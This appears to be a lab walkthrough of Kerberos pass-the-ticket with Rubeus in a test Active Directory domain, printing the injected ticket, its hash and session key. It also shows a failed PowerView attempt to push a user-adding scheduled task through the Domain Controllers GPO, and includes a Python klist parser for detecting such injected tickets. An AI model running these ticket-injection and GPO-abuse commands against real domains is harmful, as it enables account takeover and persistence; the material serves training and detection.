Requesting a TGT for the user gpowrite.user

This exercise must be carried out as the user gpowrite.user.

First we can run the klist command to see which tickets the current logon session already holds:

C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (2)

#0>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: First-DC.spartancybersec.corp

#1>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp

Next, a TGT for gpowrite.user is requested with Rubeus and imported into the current session:

C:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGDDCCBgigAwIBBaEDAgEWooIFBDCCBQBhggT8MIIE+KADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
      T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKwwggSooAMCARKh
      AwIBAqKCBJoEggSWU3ykUEX1iauJdgy6kCv2SA8a9VxZqAJTG3nV0KtcXvT5AX4Z5qxhJkJle4kwe++X
      BP/vg7hjlx8txvvRK1/B9P7ACy8StJeO/YNMYkrn1FH8Shiyn3TeeIGD4SuqvsNXSXb1dKyrOi9p7Gt6
      7Kf4ifdlUOyTBizCYZf3BkP0Igk/FaelyxZZDSq0kwpSkMqbLrAKvxGHzSVWD6UmsNnJUUmwRnOr3ncN
      4bX7+3WxTu7WgAi5nmY2BqFvjN0Exh+kQG2AldwDPJgN4tR9pgfESShgd3p7dn0S9orobVgnVqRpg5rO
      18OF6ioi3cNnYa23c9YQy91x603lZt0MkJOSjT6A94d0HbjtDCdPKXD0ZU5/cONIUmmqRaS23FXcgl12
      +BeZjtwdLTPJRMfKAGApxLbeBZFdQvsncROhpOtAdgNaQCD91obY4nJV7lzRpx0X4UpVw2hnMuV2LETC
      1x+fmZLLN2VBlJPWGXY8m+zfPAYFI4JxllY3xGUAXSCrLy61Rv3EXY4yyMuhhv4GXmvHv5Ru5ShHAOl2
      HiJcqc29Ehn9AIcrAE/pMiWVYHMMt4hAudpv2qQYGtOLCvdek9dMqv2uAcUl9/g5ekcD2fyoR2TMK8hL
      EiCfKAzOZDHanq8n50czpA211L3eLts+zTjYhafWxTUxKUsiDt2gpaLBslueAEXTy09n7H9wbwxZKcei
      HvLV+ZMkiPGewa29JeZFVkrOEE/Gw3PSiq23S8qq4ZvB/5cEesR89eWJkoDJIlVwgUosqzh7P1R+tCYC
      /UTrb+X14jtxFbAY5tzZtWYiEM1el2GPXdV2F+W9NlDzXqOLT5UOFrGC8xpr6FwUVEwILvKKX8+5NpUd
      HYk8OG4f6hWcyxJpSf431EM4I2BtlqkEpRKTYZwExko33z7VhnMVwXabBOuykIs5NbB+DhwgWla4bx3/
      4RYB0Iw7fUSAYbRRda04EzdJ7i+uu9ApIloyToogf792lO6rkEoZLCQm6hpmnh6tLx2Aj7TQPbfoaCX2
      x/XC3CWUc91fUlPZXgFsVvG6wDkijEpLbVKNjiGF8nf9UkopG8uT5GbnQbTINVSLVRJkYqdVII8j6KSg
      f76GI7HO2emgR/zRInNd/phz5BVE8cgk0h6R9hCh/sjCvaiH7P4Yc7rEb9gQ9AJlT7JVaLga7J3WkJYe
      P7xy6lxLdFPXSFRpPnuvn+rTpA/D+7Ided3fnWi/Hw1BxNMFApN/TbXhWjI2xeWRW+wJePMSO8iRkqlr
      iCQQBOMIlucJWhhV1dSDPm3PaVviIxiBGBK+JG1kg3YmB8bY+MrCyHulLVfbVXQaomTmMcPRzxpw4fef
      ApogZmgpPilvprNjkPSzlYb4iFa6rx0ovYPEm5pi2Q8SlVCszUihr6vnVOC1P1U00rQ067F2R3CZABcz
      zq9txDw879r0jlr4nWp6XOuH+qcMF+mEoaXL9cfOjrongvbuzKzVz0Nz0m4xyo7jA9HdZ+5zAFiGMzUn
      sJv/vLgWKRLpkZ/MeO4PVCn4aNtGirfpP+ezm6l3tHYJ5EEj44aWwxpOyiU8w6OB8zCB8KADAgEAooHo
      BIHlfYHiMIHfoIHcMIHZMIHWoBswGaADAgEXoRIEEHJBhZJD518NJpn16zvW3Q2hFhsUU1BBUlRBTkNZ
      QkVSU0VDLkNPUlCiGjAYoAMCAQGhETAPGw1ncG93cml0ZS51c2VyowcDBQBA4QAApREYDzIwMjMxMTEy
      MjAzODUzWqYRGA8yMDIzMTExMzA2Mzg1M1qnERgPMjAyMzExMTkyMDM4NTNaqBYbFFNQQVJUQU5DWUJF
      UlNFQy5DT1JQqSkwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycA==
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  gpowrite.user (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/12/2023 8:38:53 PM
  EndTime                  :  11/13/2023 6:38:53 AM
  RenewTill                :  11/19/2023 8:38:53 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  ckGFkkPnXw0mmfXrO9bdDQ==
  ASREP (key)              :  64FBAE31CC352FC26AF97CBDEF151E03

After the above, we will have a session whose ticket can be validated with klist:

C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (1)

#0>     Client: gpowrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:38:53 (local)
        End Time:   11/13/2023 6:38:53 (local)
        Renew Time: 11/19/2023 20:38:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
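
The second klist listing differs from the first in two details a defender can key on: the TGT's Session Key Type is now RSADSI RC4-HMAC(NT) while the ticket itself (and every ticket in the first listing) uses AES-256, and the Kdc Called field of the imported ticket is empty. The Python below is an added example, not code from this exercise or from Rubeus: it parses klist text and flags cached tickets that show either trait. The sample input is assembled from the two listings above into one constructed session, and the parser's names (Ticket, parse_klist, summarize) are this example's own, not a Windows API.

```python
"""
Parse the text output of the Windows `klist` command and flag cached Kerberos
tickets that look like they were injected with a downgraded session key:
an RC4 session key on a ticket the KDC encrypted with AES, and/or an empty
'Kdc Called' field on a TGT (the LSA records the KDC it contacted; a ticket
imported from a .kirbi blob has none).
"""
import re
from dataclasses import dataclass, field

# Constructed sample: ticket #0 is copied from the page's second klist listing
# (the imported gpowrite.user TGT), ticket #1 from the first listing.
SAMPLE_KLIST = """\
Current LogonId is 0:0x10d6046
Cached Tickets: (2)

#0>     Client: gpowrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:38:53 (local)
        End Time:   11/13/2023 6:38:53 (local)
        Renew Time: 11/19/2023 20:38:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp
"""


@dataclass
class Ticket:
    index: int
    client: str = ""
    server: str = ""
    ticket_enc: str = ""      # "KerbTicket Encryption Type": key the KDC used
    session_key: str = ""     # "Session Key Type": key the client negotiated
    flags: list = field(default_factory=list)
    kdc_called: str = ""


_ENTRY_RE = re.compile(r"^#(\d+)>\s*(.*)$")
_FLAGS_RE = re.compile(r"^\s*Ticket Flags\s+(0x[0-9a-fA-F]+)\s*->\s*(.*)$")
_KV_RE = re.compile(r"^\s*([A-Za-z ]+?):\s*(.*)$")


def parse_klist(text):
    """Turn klist output into a list of Ticket records, in listing order."""
    tickets, current = [], None
    for raw in text.splitlines():
        m = _ENTRY_RE.match(raw)
        if m:
            current = Ticket(index=int(m.group(1)))
            tickets.append(current)
            raw = m.group(2)          # "Client: ..." shares the "#N>" line
        if current is None:
            continue                  # header lines before the first entry
        fm = _FLAGS_RE.match(raw)
        if fm:
            current.flags = fm.group(2).split()
            continue
        km = _KV_RE.match(raw)
        if not km:
            continue
        key, value = km.group(1).strip(), km.group(2).strip()
        if key == "Client":
            current.client = value
        elif key == "Server":
            current.server = value
        elif key == "KerbTicket Encryption Type":
            current.ticket_enc = value
        elif key == "Session Key Type":
            current.session_key = value
        elif key == "Kdc Called":
            current.kdc_called = value
    return tickets


def rc4_session_on_aes_ticket(t):
    """RC4 session key although the KDC issued the ticket with AES: the domain
    supports AES, so the client asked for RC4. Client-side counterpart of
    alerting on 4768/4769 events whose encryption type is 0x17 (RC4-HMAC)."""
    return "RC4" in t.session_key.upper() and "AES" in t.ticket_enc.upper()


def tgt_without_kdc(t):
    """A TGT with no 'Kdc Called' value, as the imported ticket above shows."""
    return t.server.lower().startswith("krbtgt/") and t.kdc_called == ""


def summarize(text):
    """Indices of suspicious tickets, keyed by the heuristic that fired."""
    tickets = parse_klist(text)
    return {
        "total": len(tickets),
        "rc4_session_keys": [t.index for t in tickets if rc4_session_on_aes_ticket(t)],
        "missing_kdc": [t.index for t in tickets if tgt_without_kdc(t)],
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_KLIST))
```

Running the block on the constructed listing reports ticket #0 under both heuristics and leaves #1 clean. On a real host the same function can be fed the output of `klist` from each logon session; an RC4 session key is also what legitimate clients produce in domains where AES is not enabled for the account, so treat the flag as a pivot for looking at the matching 4768 event rather than as proof on its own.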

If we run the following step, we get an error:

PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp
VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9}
Set-Content : Network access is denied.
At line:6104 char:28
+ ...  $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException
    + FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommand
